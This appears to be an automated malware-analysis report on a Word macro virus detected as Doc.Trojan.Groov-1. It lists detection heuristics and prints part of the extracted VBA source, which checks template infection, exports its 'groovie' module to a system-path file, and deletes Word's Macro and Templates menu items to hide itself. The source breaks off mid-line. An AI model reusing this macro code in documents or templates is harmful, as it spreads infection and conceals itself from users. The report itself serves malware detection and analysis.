MALICIOUS
360
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample exhibits multiple high and critical heuristic firings related to legacy WordBasic and VBA macros, including the use of Shell() calls and auto-execution functions like AutoOpen. The presence of 'Doc.Trojan.Groov-1' from ClamAV further confirms its malicious nature. The VBA script, though truncated, indicates macro execution and potential payload delivery, consistent with a macro-based malware dropper.
Heuristics 7
-
ClamAV: Doc.Trojan.Groov-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Groov-1
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16279 bytes |
SHA-256: 2929728523e96dc41e7b1f373e3dbe529060149b8d56b2bc5b208a3ca2244110 |
|||
|
Detection
ClamAV:
Doc.Trojan.Groov-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "groovie"
Public I01 As String
Public I03 As Boolean
' O12/22/98 5:35:20 AM728OIT728Xerox Printer on LPT2:
Public I04 As Boolean
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Public I05 As Boolean
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Public I06 As String
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Public I07 As Boolean
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Public I08 As Boolean
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Function I09()
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
On Error Resume Next
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If MacroContainer = NormalTemplate Then
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
I01 = "normal"
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
GoTo checkout
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
End If
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If MacroContainer = ActiveDocument Then I01 = "document"
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If MacroContainer = "data.dot" Then I01 = "orbit"
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
checkout:
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
End Function
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Function I10()
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
On Error Resume Next
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If Dir(Application.StartupPath + "\data.dot") = "data.dot" Then I02 = True
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If ActiveDocument.VBProject.VBComponents(I).Name = "groovie" Then I04 = True
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Next I
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If NormalTemplate.VBProject.VBComponents(I).Name = "groovie" Then I03 = True
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Next I
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If GetAttr(NormalTemplate.FullName) = vbArchive + vbReadOnly Or GetAttr(NormalTemplate.FullName) = vbReadOnly Then I05 = True
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
End Function
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Function I11()
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
On Error Resume Next
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Call I09
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Call I10
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If I01 = "document" Then Call I12
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If I01 = "normal" Then Call I13
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If I01 = "orbit" Then Call I14
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If I05 = False Then CommandBars("tools").Controls("Macro").Delete
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If I05 = False Then CommandBars("tools").Controls("Templates and add-ins...").Delete
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
End Function
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Function I12()
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
On Error Resume Next
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Application.VBE.ActiveVBProject.VBComponents("groovie").Export "c:\groovie.sys"
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If I03 = False And I05 = False Then
' O12/22/98 5:35:21 AM728OIT728Xerox Prin
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.